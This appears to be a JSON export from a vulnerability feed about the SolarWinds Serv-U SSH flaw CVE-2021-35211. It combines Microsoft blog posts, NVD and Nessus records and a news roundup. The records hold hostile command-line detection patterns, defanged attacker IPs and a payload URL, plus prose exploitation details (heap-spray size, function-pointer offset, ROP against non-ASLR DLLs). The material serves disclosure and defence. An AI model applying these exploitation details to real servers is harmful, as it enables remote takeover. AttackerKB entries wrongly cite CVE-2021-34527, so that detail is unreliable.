here.\n\n`EXCEPTION: C0000005; CSUSSHSocket::ProcessReceive(); Type: 30; puchPayLoad = 0x03e909f6; nPacketLength = 76; nBytesReceived = 80; nBytesUncompressed = 156; uchPaddingLength = 5`\n\nAdditional signs of potential compromise include:\n\n * Recent creation of_ .txt_ files in the Client\\Common\\ directory for the Serv-U installation. These files may contain output from Windows commands like whoami and dir.\n * _Serv-U.exe_ spawning child processes that are not part of normal operations. 
These could change depending on the customer environment, but we suggest searching for: \n * _mshta.exe_\n * _powershell.exe_\n * cmd.exe (or conhost.exe then spawning cmd.exe) with any of the following in the command line: \n * _whoami_\n * _dir_\n * _./Client/Common_\n * _.\\Client\\Common_\n * _type [a file path] > "C:\\ProgramData\\RhinoSoft\\Serv-U\\Users\\Global Users\\\\[file name].Archive"_\n * Any process with any of the following in the command line: \n * _C:\\Windows\\Temp\\_\n * The addition of any unrecognized [global users](<https://documentation.solarwinds.com/en/success_center/servu/content/servu-global-users-global-users.htm>) to Serv-U. This can be checked in the Users tab of the Serv-U Management Console, as shown below. It can also be checked by looking for recently created files in _C:\\ProgramData\\RhinoSoft\\Serv-U\\Users\\Global Users_, which appears to store the Global users information.\n\n\n\n### Detection details\n\n#### Antivirus detections\n\nMicrosoft Defender Antivirus detects threat components as the following malware:\n\n * Behavior:Win32/ServuSpawnSuspProcess.A\n * Behavior:Win32/ServuSpawnCmdClientCommon.A\n\n#### Endpoint detection and response (EDR) alerts\n\nAlerts with the following titles in Microsoft Defender for Endpoint can indicate threat activity on your network:\n\n * Suspicious behavior by Serv-U.exe\n\n#### Azure Sentinel query\n\nTo locate possible exploitation activity using Azure Sentinel, customers can find a Sentinel query containing these indicators in this [GitHub repository](<https://github.com/Azure/Azure-Sentinel/blob/master/Detections/MultipleDataSources/DEV-0322_SolarWinds_Serv-U_IOC.yaml>).\n\n### Indicators of compromise (IOCs)\n\n * 98[.]176[.]196[.]89\n * 68[.]235[.]178[.]32\n * 208[.]113[.]35[.]58\n * 144[.]34[.]179[.]162\n * 97[.]77[.]97[.]58\n * hxxp://144[.]34[.]179[.]162/a\n * C:\\Windows\\Temp\\Serv-U.bat\n * C:\\Windows\\Temp\\test\\current.dmp\n\nThe post [Microsoft discovers threat actor 
targeting SolarWinds Serv-U software with 0-day exploit](<https://www.microsoft.com/security/blog/2021/07/13/microsoft-discovers-threat-actor-targeting-solarwinds-serv-u-software-with-0-day-exploit/>) appeared first on [Microsoft Security Blog](<https://www.microsoft.com/security/blog>).", "edition": 2, "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 10.0, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 6.0}, "published": "2021-07-13T22:30:17", "type": "mssecure", "title": "Microsoft discovers threat actor targeting SolarWinds Serv-U software with 0-day exploit", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-35211"], "modified": "2021-07-13T22:30:17", "id": "MSSECURE:79BA2A7EEC02196D9F15979AFB6BD9D2", "href": "https://www.microsoft.com/security/blog/2021/07/13/microsoft-discovers-threat-actor-targeting-solarwinds-serv-u-software-with-0-day-exploit/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-09-02T16:25:01", "description": "Several weeks ago, Microsoft detected a 0-day remote code execution exploit being used to attack the SolarWinds Serv-U FTP software in limited and targeted attacks. 
The Microsoft Threat Intelligence Center (MSTIC) attributed the [attack](<https://www.microsoft.com/security/blog/2021/07/13/microsoft-discovers-threat-actor-targeting-solarwinds-serv-u-software-with-0-day-exploit/>) with high confidence to DEV-0322, a group operating out of China, based on observed victimology, tactics, and procedures. In this blog, we share technical information about the vulnerability, tracked as [CVE-2021-35211](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-35211>), that we shared with SolarWinds, who promptly released [security updates](<https://www.solarwinds.com/trust-center/security-advisories/cve-2021-35211>) to fix the vulnerability and mitigate the attacks.\n\nThis analysis was conducted by the Microsoft Offensive Research & Security Engineering team, a focused group tasked with supporting teams like MSTIC with exploit development expertise. Our team\u2019s remit is to make computing safer. We do this by leveraging our knowledge of attacker techniques and processes to build and improve protections in Windows and Azure through reverse engineering, attack creation and replication, vulnerability research, and intelligence sharing.\n\nIn early July, MSTIC provided our team with data that seemed to indicate exploit behavior against a newly-discovered vulnerability in the SolarWinds Serv-U FTP server\u2019s SSH component. Although the intel contained useful indicators, it lacked the exploit in question, so our team set out to reconstruct the exploit, which required us to first find and understand the new vulnerability in the Serv-U SSH-related code.\n\nAs we knew this was a remote, pre-auth vulnerability, we quickly constructed a fuzzer focused on the pre-auth portions of the SSH handshake and noticed that the service captured and passed all access violations without terminating the process. It immediately became evident that the Serv-U process would make stealthy, reliable exploitation attempts simple to accomplish. 
We concluded that the exploited vulnerability was caused by the way Serv-U initially created an OpenSSL AES128-CTR context. This, in turn, could allow the use of uninitialized data as a function pointer during the decryption of successive SSH messages. Therefore, an attacker could exploit this vulnerability by connecting to the open SSH port and sending a malformed pre-auth connection request. We also discovered that the attackers were likely using DLLs compiled without address space layout randomization (ASLR) loaded by the Serv-U process to facilitate exploitation.\n\nWe shared these findings, as well as the fuzzer we created, with SolarWinds through [Coordinated Vulnerability Disclosure](<https://www.microsoft.com/en-us/msrc/cvd?rtc=1>) (CVD) via [Microsoft Security Vulnerability Research](<https://www.microsoft.com/en-us/msrc/msvr>) (MSVR), and worked with them to fix the issue. This is an example of intelligence sharing and industry collaboration that results in comprehensive protection for the broader community through detection of attacks in products and fixing of vulnerabilities through security updates.\n\n### Vulnerability in Serv-U\u2019s implementation of SSH\n\nSecure Shell (SSH) is a widely adopted protocol for secure communications over an untrusted network. The protocol behavior is defined in multiple requests for comment (RFCs), and existing implementations are available in open-source code; we primarily used [RFC 4253](<https://datatracker.ietf.org/doc/html/rfc4253>), [RFC 4252](<https://datatracker.ietf.org/doc/html/rfc4252>), and [libssh](<https://git.libssh.org/projects/libssh.git/tree/>) as references for this analysis.\n\nThe implementation of SSH in Serv-U was found by enumerating references to the \u201cSSH-\u201d string, which must be present in the first data sent to the server. The most likely instance of such code was the following:\n\n\n\n_Figure 1. 
Promising instance of \u201cSSH-\u201d string_\n\nPutting a breakpoint on the above code and attempting to connect to Serv-U with an SSH client confirmed our hypothesis and resulted in the breakpoint being hit with the following call stack:\n\n\n\n_Figure 2. The call stack resulting from a break point set on code in Figure 1._\n\nAt this point, we noticed that _Serv-U.dll_ and _RhinoNET.dll_ both have ASLR support disabled, making them prime locations for ROP gadgets, as any addresses within them will be constant across any server instances running on the internet for a given Serv-U version.\n\nAfter reversing related code in the _RhinoNET_ and _Serv-U_ DLLs, we could track SSH messages\u2019 paths as Serv-U processes them. To handle an incoming SSH connection, _Serv-U.dll_ creates a _CSUSSHSocket_ object, which is derived from the _RhinoNET!CRhinoSocket class_. The _CSUSSHSocket_ object lifetime is the length of the TCP connection\u2014it persists across possibly many individual TCP packets. The underlying _CRhinoSocket_ provides a buffered interface to the socket such that a single TCP packet may contain any number of bytes. This implies a single packet may include any number of SSH messages (provided they fit in the maximum buffer size), as well as partial SSH messages. The _CSUSSHSocket::ProcessRecvBuffer_ function is then responsible for parsing the SSH messages from the buffered socket data.\n\n_CSUSSHSocket::ProcessRecvBuffer_ begins by checking for the SSH version with _ParseBanner_. If _ParseBanner_ successfully parses the SSH version from the banner, _ProcessRecvBuffer_ then loops over _ParseMessage_, which obtains a pointer to the current message in the socket data and extracts the _msg_id_ and _length_ fields from the message (more on the _ParseMessage_ function later).\n\n\n\n_Figure 3. 
Selection of code from CSUSSHSocket::ProcessRecvBuffer processing loop_\n\nThe socket data being iterated over is conceptually an array of the pseudo-C structure _ssh_msg_t_, as seen below. The message data is contained within the payload buffer, the first byte of which is considered the _msg_id_:\n\n\n\n_ProcessRecvBuffer_ then dispatches handling of the message based on the _msg_id_. Some messages are handled directly from the message parsing loop, while others get passed to _ssh_pkt_others_, which posts the message to a queue for another thread to pick up and process.\n\n\n\n_Figure 4. Pre-auth reachable handlers in CSUSSHSocket::ProcessRecvBuffer_\n\nIf the _msg_id_ is deferred to the alternate thread, _CSSHSession::OnSSHMessage_ processes it. This function mainly deals with messages that need to interact with Serv-U managed user profile data (e.g., authentication against per-user credentials) and UI updates. _CSSHSession::OnSSHMessage_ turned out to be uninteresting in terms of vulnerability hunting as most message handlers within it require successful user authentication (initial telemetry indicated this was a pre-authentication vulnerability), and no vulnerabilities were found in the remaining handlers.\n\nWhen initially running fuzzers against Serv-U with a debugger attached, it was evident that the application was catching exceptions which would normally crash a process (such as access violations), logging the error, modifying state just enough to avoid termination of the process, and then continuing as if there had been no problem. This behavior improves uptime of the file server application but also results in possible memory corruption lingering around in the process and building up over time. 
As an attacker, this grants opportunities like brute-forcing addresses of code or data with dynamic addresses.\n\nThis squashing of access violations assists with exploitation, but for fuzzing, we filtered out \u201cuninteresting\u201d exceptions generated by read/write access violations and let the fuzzer run until hitting a fault wherein RIP had been corrupted. This quickly resulted in the following crashing context:\n\n\n\n_Figure 5. WinDbg showing crashing context from fuzzer-generated SSH messages_\n\nAs seen above, _CRYPTO_ctr128_encrypt_ in _libeay32.dll_ (part of OpenSSL) attempted to call an invalid address. The version of OpenSSL used is 1.0.2u, so we obtained the [sources](<https://www.openssl.org/source/old/1.0.2/openssl-1.0.2u.tar.gz>) to peruse. The following shows the relevant OpenSSL function:\n\n\n\nMeanwhile, the following shows the structure that is passed:\n\n\n\nThe crashing function was reached from the OpenSSL API boundary via the following path: _EVP_EncryptUpdate_ -> _evp_EncryptDecryptUpdate_ -> _aes_ctr_cipher_ -> _CRYPTO_ctr128_encrypt_.\n\nLooking further up the call stack, it is evident that Serv-U calls _EVP_EncryptUpdate_ from _CSUSSHSocket::ParseMessage_, as seen below:\n\n\n\n_Figure 6. Location of call into OpenSSL, wherein attacker-controlled function pointer may be invoked_\n\nAt this point, we manually minimized the TCP packet buffer produced by the fuzzer until only the SSH messages required to trigger the crash remained. In notation like that used in the RFCs, the required SSH messages were:\n\n\n\nNote that the following description references \u201cencrypt\u201d functions being called when the crashing code path is clearly attempting to decrypt a buffer. 
This is not an error: Serv-U uses the encrypt OpenSSL API and, while not optimal for code clarity, it is behaviorally correct since Advanced Encryption Standard (AES) is operating in counter (CTR) mode.\n\nAfter taking a Time Travel Debugging trace and debugging through the message processing sequence, we found that the root cause of the issue was that Serv-U initially creates the OpenSSL AES128-CTR context with code like the following:\n\n\n\nCalling [_EVP_EncryptInit_ex_](<https://www.openssl.org/docs/man1.0.2/man3/EVP_EncryptInit_ex.html>) with NULL key and/or IV is valid, and Serv-U does so in this case because the context is created while handling the KEXINIT message, which is before key material is ready. However, AES key expansion is not performed until the key is set, and the data in the _ctx->cipher_data_ structure remains uninitialized until the key expansion is performed. We can (correctly) surmise that our sequence of messages to hit the crash has caused _enc_algo_client_to_server->decrypt_ to be called before the key material is initialized. The Serv-U KEXINIT handler creates objects for all parameters given in the message. However, the corresponding objects currently active for the connection are not replaced with the newly created ones until the following NEWKEYS message is processed. In a normal SSH connection, the client always completes the key exchange process before issuing a NEWKEYS message. Serv-U processed NEWKEYS (thus setting the _m_bCipherActive_ flag and replacing the cipher objects) regardless of the connection or key exchange state. 
From this, we can see that the last message type in our fuzzed sequence does not matter\u2014there only needs to be some data remaining to be processed in the socket buffer to trigger decryption after the partially initialized AES CTR cipher object has been activated.\n\n### Exploitation\n\nAs the vulnerability allows loading RIP from uninitialized memory and as there are some modules without ASLR in the process, exploitation is not so complicated: we can find a way to control the content of the uninitialized _cipher_data_ structure, point the _cipher_data->block_ function pointer at some initial ROP gadget, and start a ROP chain. Because of the exception handler causing any fault to be ignored, we do not necessarily need to attain reliable code execution upon the first packet. It is possible to retry exploitation until code execution is successful; however, this will leave traces in log files, and as such it may be worthwhile to invest more effort into a different technique which would avoid logging.\n\nThe first step is to find the size of the _cipher_data_ allocation, as the most direct avenue to prefill the buffer is to spray allocations of the target allocation size and free them before attempting to reclaim the address as _cipher_data_. _ctx->cipher_data_ is allocated and assigned in EVP_CipherInit_ex with the following line:\n\n\n\nWith a debugger, we can see the _ctx_size_ in our case is _0x108_, and that this allocator winds up calling _ucrtbase!_malloc_base_. From previous reversing, we know that both _CRhinoSocket_ and _CSUSSHSocket_ levels of packet parsing call _operator new[]_ to allocate space to hold the packets we send. Luckily, that also winds up in _ucrtbase!_malloc_base_, using the same heap. Therefore, prefilling the target allocation is as simple as sending a properly sized TCP packet or SSH message and then closing the connection to ensure it is freed. 
Using this path to spray does not trigger other allocations of the same size, so we don\u2019t have to worry about polluting the heap.\n\nAnother important value to pull out of the debugger/disassembly is _offsetof(EVP_AES_KEY, block)_, as that offset in the sprayed data needs to be set to the initial ROP gadget. This value is _0xf8_. Conveniently, most of the rest of the _EVP_AES_KEY_ structure can be used for the ROP chain contents itself, and a pointer to the base of this structure exists in registers _rbx_, _r8_, and _r10_ at the time of the controlled function pointer call.\n\nAs a simple proof of concept, consider the following Python code:\n\n\n\nThe above results in the following context in the debugger:\n\n\n\n_Figure 7. Machine context showing rcx, rdx, and rip controlled by attacker_\n\n### Conclusion: Responsible disclosure and industry collaboration improve security for all\n\nOur research shows that the Serv-U SSH server is subject to a pre-auth remote code execution vulnerability that can be easily and reliably exploited in the default configuration. An attacker can exploit this vulnerability by connecting to the open SSH port and sending a malformed pre-auth connection request. When successfully exploited, the vulnerability could then allow the attacker to install or run programs, such as in the case of the targeted attack we previously reported.\n\nWe shared our findings with SolarWinds through [Coordinated Vulnerability Disclosure](<https://www.microsoft.com/en-us/msrc/cvd?rtc=1>) (CVD). We also shared the fuzzer we created. SolarWinds released an [advisory and security patch](<https://www.solarwinds.com/trust-center/security-advisories/cve-2021-35211>), which we strongly encourage customers to apply. 
If you are not sure if your system is affected, open a support case in the [SolarWinds Customer Portal](<https://customerportal.solarwinds.com/support/submit-a-ticket?sid=satsn>).\n\nIn addition to sharing vulnerability details and fuzzing tooling with SolarWinds, we also recommended [enabling ASLR compatibility](<https://docs.microsoft.com/en-us/cpp/build/reference/dynamicbase-use-address-space-layout-randomization?view=msvc-160>) for all binaries loaded in the Serv-U process. Enabling ASLR is a simple compile-time flag which is enabled by default and has been available since Windows Vista. ASLR is a critical security mitigation for services which are exposed to untrusted remote inputs, and requires that all binaries in the process are compatible in order to be effective at preventing attackers from using hardcoded addresses in their exploits, as was possible in Serv-U.\n\nWe would like to thank SolarWinds for their prompt response. This case further underscores the need for constant collaboration among software vendors, security researchers, and other players to ensure the safety and security of users\u2019 computing experience.\n\n \n\n**_Microsoft Offensive Research & Security Engineering team_**\n\n \n\nThe post [A deep-dive into the SolarWinds Serv-U SSH vulnerability](<https://www.microsoft.com/security/blog/2021/09/02/a-deep-dive-into-the-solarwinds-serv-u-ssh-vulnerability/>) appeared first on [Microsoft Security Blog](<https://www.microsoft.com/security/blog>).", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 10.0, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 6.0}, "published": "2021-09-02T16:00:56", "type": "mssecure", "title": "A deep-dive 
into the SolarWinds Serv-U SSH vulnerability", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-35211"], "modified": "2021-09-02T16:00:56", "id": "MSSECURE:C6E199EAD7CE978C9F1B558F17746AFD", "href": "https://www.microsoft.com/security/blog/2021/09/02/a-deep-dive-into-the-solarwinds-serv-u-ssh-vulnerability/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "cve": [{"lastseen": "2022-07-13T16:47:13", "description": "Microsoft discovered a remote code execution (RCE) vulnerability in the SolarWinds Serv-U product utilizing a Remote Memory Escape Vulnerability. If exploited, a threat actor may be able to gain privileged access to the machine hosting Serv-U Only. 
SolarWinds Serv-U Managed File Transfer and Serv-U Secure FTP for Windows before 15.2.3 HF2 are affected by this vulnerability.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2021-07-14T21:15:00", "type": "cve", "title": "CVE-2021-35211", "cwe": ["NVD-CWE-noinfo"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-35211"], "modified": "2022-07-12T17:42:00", "cpe": ["cpe:/a:solarwinds:serv-u:15.2.3"], "id": "CVE-2021-35211", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2021-35211", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:a:solarwinds:serv-u:15.2.3:hotfix1:*:*:*:*:*:*", "cpe:2.3:a:solarwinds:serv-u:15.2.3:-:*:*:*:*:*:*"]}], "nessus": [{"lastseen": "2022-04-11T21:22:32", "description": "According to its banner, the installed version of Serv-U is a version prior to 15.2.3 Hotfix 2. It is, therefore, affected by a memory escape vulnerability. 
An unauthenticated remote attacker who successfully exploited this vulnerability could run arbitrary code with privileges, which could then install programs; view, change, or delete data; or run programs on the affected system.\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version number.", "cvss3": {"score": 10, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H"}, "published": "2021-07-15T00:00:00", "type": "nessus", "title": "Serv-U FTP Server <= 15.2.3 Hotfix 1 Memory Escape Vulnerability", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2021-35211"], "modified": "2022-04-11T00:00:00", "cpe": ["cpe:/a:solarwinds:serv-u_file_server"], "id": "SERVU_15_2_3_2.NASL", "href": "https://www.tenable.com/plugins/nessus/151646", "sourceData": "#%NASL_MIN_LEVEL 70300\n##\n# (C) Tenable Network Security, Inc.\n##\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(151646);\n script_version(\"1.9\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/04/11\");\n\n script_cve_id(\"CVE-2021-35211\");\n script_xref(name:\"IAVA\", value:\"2021-A-0322-S\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2021/11/17\");\n\n script_name(english:\"Serv-U FTP Server <= 15.2.3 Hotfix 1 Memory Escape Vulnerability\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote FTP server is affected by an Memory Escape vulnerability.\");\n script_set_attribute(attribute:\"description\", value:\n\"According to its banner, the installed version of Serv-U is a version prior to 15.2.3 Hotfix 2. It is, therefore, \naffected memory escape vulnerability. 
An unauthenticated remote attacker who successfully exploited this vulnerability \ncould run arbitrary code with privileges, which could then install programs; view, change, or delete data; or run \nprograms on the affected system.\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version\nnumber.\");\n # https://www.solarwinds.com/trust-center/security-advisories/cve-2021-35211\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?ebb78655\");\n # https://support.solarwinds.com/SuccessCenter/s/article/Serv-U-15-2-3-HotFix-2?language=en_US\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?1a78dfac\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to ServU-FTP 15.2.3 Hotfix 2 or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2021-35211\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2021/07/09\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2021/07/09\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2021/07/15\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:solarwinds:serv-u_file_server\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_set_attribute(attribute:\"thorough_tests\", value:\"true\");\n 
script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"FTP\");\n\n script_copyright(english:\"This script is Copyright (C) 2021-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"servu_version.nasl\");\n script_require_keys(\"installed_sw/Serv-U\");\n\n exit(0);\n}\n\ninclude('vcf.inc');\ninclude('ftp_func.inc');\n\nvar port = get_ftp_port(default:21);\n\nvar app_info = vcf::get_app_info(app:'Serv-U', port:port);\n\nvar constraints = [\n {'fixed_version' : '15.2.3.742' , 'fixed_display' : '15.2.3.742 HF2'}\n];\n\nvcf::check_version_and_report(app_info:app_info, constraints:constraints, severity:SECURITY_HOLE);\n", "cvss": {"score": 10, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "attackerkb": [{"lastseen": "2022-07-03T20:03:52", "description": "Microsoft discovered a remote code execution (RCE) vulnerability in the SolarWinds Serv-U product utilizing a Remote Memory Escape Vulnerability. If exploited, a threat actor may be able to gain privileged access to the machine hosting Serv-U Only. SolarWinds Serv-U Managed File Transfer and Serv-U Secure FTP for Windows before 15.2.3 HF2 are affected by this vulnerability.\n\n \n**Recent assessments:** \n \n**NinjaOperator** at July 12, 2021 4:00pm UTC reported:\n\nSolarWinds was recently notified by Microsoft of a security vulnerability (RCE) related to Serv-U Managed File Transfer Server and Serv-U Secured FTP and have developed a hotfix to resolve this vulnerability. While Microsoft\u2019s research indicates this vulnerability exploit involves a limited, targeted set of customers and a single threat actor, our joint teams have mobilized to address it quickly.\n\nThe vulnerability exists in the latest Serv-U version 15.2.3 HF1 released May 5, 2021, and all prior versions. 
A threat actor who successfully exploits CVE-2021-34527 can run arbitrary code with SYSTEM privileges and install programs; view, change, or delete data, and run programs.\n\n**wvu-r7** at July 22, 2021 4:35pm UTC reported:\n\nSolarWinds was recently notified by Microsoft of a security vulnerability (RCE) related to Serv-U Managed File Transfer Server and Serv-U Secured FTP and have developed a hotfix to resolve this vulnerability. While Microsoft\u2019s research indicates this vulnerability exploit involves a limited, targeted set of customers and a single threat actor, our joint teams have mobilized to address it quickly.\n\nThe vulnerability exists in the latest Serv-U version 15.2.3 HF1 released May 5, 2021, and all prior versions. A threat actor who successfully exploits CVE-2021-34527 can run arbitrary code with SYSTEM privileges and install programs; view, change, or delete data, and run programs.\n\nAssessed Attacker Value: 5 \nAssessed Attacker Value: 5\nAssessed Attacker Value: 4\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2021-07-13T00:00:00", "type": "attackerkb", "title": "CVE-2021-35211", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, 
"acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-34527", "CVE-2021-35211"], "modified": "2021-07-27T00:00:00", "id": "AKB:9ADF44D2-FA0D-4643-8B97-8B46983B6917", "href": "https://attackerkb.com/topics/Toj3cA6kd7/cve-2021-35211", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "avleonov": [{"lastseen": "2021-07-28T14:34:07", "description": "Hello guys! The fourth episode of Last Week\u2019s Security news, July 12 \u2013 July 18.\n\nI would like to start with some new public exploits. I think these 4 are the most interesting.\n\n * If you remember, 2 weeks ago I mentioned the ForgeRock Access Manager and OpenAM vulnerability (CVE-2021-35464). Now there is a [public RCE exploit](<https://vulners.com/packetstorm/PACKETSTORM:163525>) for it. ForgeRock OpenAM server is a popular access management solution for web applications. [Michael Stepankin, Researcher](<https://portswigger.net/research/pre-auth-rce-in-forgerock-openam-cve-2021-35464>): "In short, RCE is possible thanks to unsafe Java deserialization in the Jato framework used by OpenAM". And now this vulnerability [is Under Active Attack](<https://thehackernews.com/2021/07/critical-rce-flaw-in-forgerock-access.html>). "The [Australian Cyber Security Centre] has observed actors exploiting this vulnerability to compromise multiple hosts and deploy additional malware and tools," the organization said in an alert. ACSC didn't disclose the nature of the attacks, how widespread they are, or the identities of the threat actors exploiting them".\n * [A new exploit for vSphere Client](<https://vulners.com/packetstorm/PACKETSTORM:163487>) (CVE-2021-21985). The vSphere Client (HTML5) contains a remote code execution vulnerability due to lack of input validation in the Virtual SAN Health Check plug-in which is enabled by default in vCenter Server. 
A malicious actor with network access to port 443 may exploit this issue to execute commands with unrestricted privileges on the underlying operating system that hosts vCenter Server.\n * [Apache Tomcat 9.0.0.M1 - Open Redirect](<https://vulners.com/exploitdb/EDB-ID:50118>) (CVE-2018-11784). "When the default servlet in Apache Tomcat [\u2026] returned a redirect to a directory [\u2026] a specially crafted URL could be used to cause the redirect to be generated to any URI of the attackers choice".\n * [Apache Tomcat 9.0.0.M1 - Cross-Site Scripting](<https://vulners.com/exploitdb/EDB-ID:50119>) (CVE-2019-0221). "The SSI printenv command in Apache Tomcat [\u2026] echoes user provided data without escaping and is, therefore, vulnerable to XSS". However, in real life this is unlikely to be used. "SSI is disabled by default. The printenv command is intended for debugging and is unlikely to be present in a production website".\n\nFor the last 2 weeks I have mentioned PrintNightmare and Kaseya. These topics seem to be coming to their logical end. But there is still something to tell about them.\n\n * Microsoft has shared guidance revealing yet [another vulnerability connected to its Windows Print Spooler service](<https://www.theregister.com/2021/07/16/spooler_service_local_privilege_escalation/>), saying it is "developing a security update." \nThe latest Print Spooler service vuln [\u2026] is an elevation of privilege [\u2026]. An attacker needs to be able to execute code on the victim system to exploit the vulnerability [\u2026]. The solution? For now, you can only "stop and disable the Print Spooler service," disabling both the ability to print locally and remotely. \n * Following the supply-chain ransomware attack, Kaseya had urged on-premises VSA customers to shut down their servers until a patch was available. 
